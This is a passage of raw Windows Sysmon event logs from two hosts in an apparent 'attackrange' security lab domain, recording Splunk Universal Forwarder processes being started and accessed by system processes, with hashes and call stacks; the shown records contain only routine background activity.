10341000x8000000000000000246651Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:24.898{CB4067E1-304A-6062-0500-00000000AF01}392408C:\Windows\system32\csrss.exe{CB4067E1-52D4-6063-D322-00000000AF01}2616C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000246650Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:24.898{CB4067E1-30AF-6062-9800-00000000AF01}26721992C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{CB4067E1-52D4-6063-D322-00000000AF01}2616C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000246649Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:24.898{CB4067E1-52D4-6063-D322-00000000AF01}2616C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{CB4067E1-304A-6062-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000246648Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:24.367{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=06CA0783AEAE65511896C1EB2B67550A,SHA256=2BB54408FB31229AD79D41586704DA328E16A8858DF1383F36C80B5BA8E716D9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000246647Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:24.226{CB4067E1-30AF-6062-9C00-00000000AF01}37363764C:\Windows\system32\conhost.exe{CB4067E1-52D4-6063-D222-00000000AF01}2820C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246646Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:24.226{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246645Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:24.226{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246644Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:24.226{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246643Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:24.226{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246642Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:24.226{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246641Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:24.226{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246640Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:24.226{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246639Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:24.226{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246638Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:24.226{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246637Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:24.226{CB4067E1-304A-6062-0500-00000000AF01}392508C:\Windows\system32\csrss.exe{CB4067E1-52D4-6063-D222-00000000AF01}2820C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000246636Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:24.226{CB4067E1-30AF-6062-9800-00000000AF01}26721992C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{CB4067E1-52D4-6063-D222-00000000AF01}2820C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000246635Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:24.226{CB4067E1-52D4-6063-D222-00000000AF01}2820C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{CB4067E1-304A-6062-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000246634Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:24.023{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0F2A46BFD9AF575580275213A1730546,SHA256=CE1BCC3253423B53D3B02DA4D85F9CDD5C8DF9C48E99C2AF12AFC01358CA06C9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001061945Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:25.824{7F8C56E7-4E4D-6063-3B00-00000000AF01}28842140C:\Windows\system32\conhost.exe{7F8C56E7-52D5-6063-4E01-00000000AF01}3752C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061944Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:25.824{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061943Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:25.824{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061942Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:25.824{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061941Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:25.824{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061940Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:25.824{7F8C56E7-4E3A-6063-0500-00000000AF01}412528C:\Windows\system32\csrss.exe{7F8C56E7-52D5-6063-4E01-00000000AF01}3752C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001061939Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:25.824{7F8C56E7-4E4C-6063-3300-00000000AF01}23643588C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7F8C56E7-52D5-6063-4E01-00000000AF01}3752C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001061938Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:25.827{7F8C56E7-52D5-6063-4E01-00000000AF01}3752C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7F8C56E7-4E3B-6063-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001061937Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:25.137{7F8C56E7-4E4D-6063-3B00-00000000AF01}28842140C:\Windows\system32\conhost.exe{7F8C56E7-52D5-6063-4D01-00000000AF01}5924C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000001061936Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:25.137{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C13DDB6D203CEE22229C22288FC2878,SHA256=CAA8FE7E26C3F97D1E82DFD1106B4DEE3ED1C5D1E0C7504982C34E41AAF9A20B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001061935Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 